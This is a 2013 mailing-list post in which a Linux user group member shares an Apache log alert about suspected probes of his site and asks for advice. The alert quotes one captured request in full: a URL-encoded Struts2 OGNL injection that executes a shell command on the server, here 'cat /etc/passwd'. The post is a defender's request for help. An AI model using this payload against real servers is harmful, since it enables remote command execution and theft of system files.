[TriLUG] Log message from Apache
Brian McCullough
bdmc at bdmcc-us.com
Wed Jul 10 13:53:14 EDT 2013
Folks,
I have received an interesting message from Apache, and am not sure
what I can do to respond. ( It seems that the site is interesting to
.cn! ) Suggestions, ideas?
A total of 5 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):
/?('%5c43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('%5c43context%5b%5c'xwork.MethodAccessor.denyMethodExecution%5c'%5d%5c75false')(b))&('%5c43c')(('%5c43_memberAccess.excludeProperties%5c75 at java.util.Collections@EMPTY_SET')(c))&(g)(('%5c43req%5c75 at org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('%5c43webRootzpro%5c75 at java.lang.Runtime@getRuntime().exec(%5c43req.getParameter(%2522cmd%2522))')(d))&(i)(('%5c43webRootzproreader%5c75new%5c40java.io.DataInputStream(%5c43webRootzpro.getInputStream())')(d))&(i01)(('%5c43webStr%5c75new%5c40byte%5b51020%5d')(d))&(i1)(('%5c43webRootzproreader.readFully(%5c43webStr)')(d))&(i111)(('%5c43webStr12%5c75new%5c40java.lang.String(%5c43webStr)')(d))&(i2)(('%5c43xman%5c75 at org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('%5c43xman%5c75 at org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('%5c43xman.getWriter().println(%22~%22%252b%22~not_exist_in_html~%22%252b%5c43webStr12%252b%22~%22!
%252b%22~3.1415621~%22)')(d))&(i99)(('%5c43xman.getWriter().close()')(d))&cmd=cat+%252Fetc%252Fpasswd
%HTTP Response 200
More information about the TriLUG
mailing list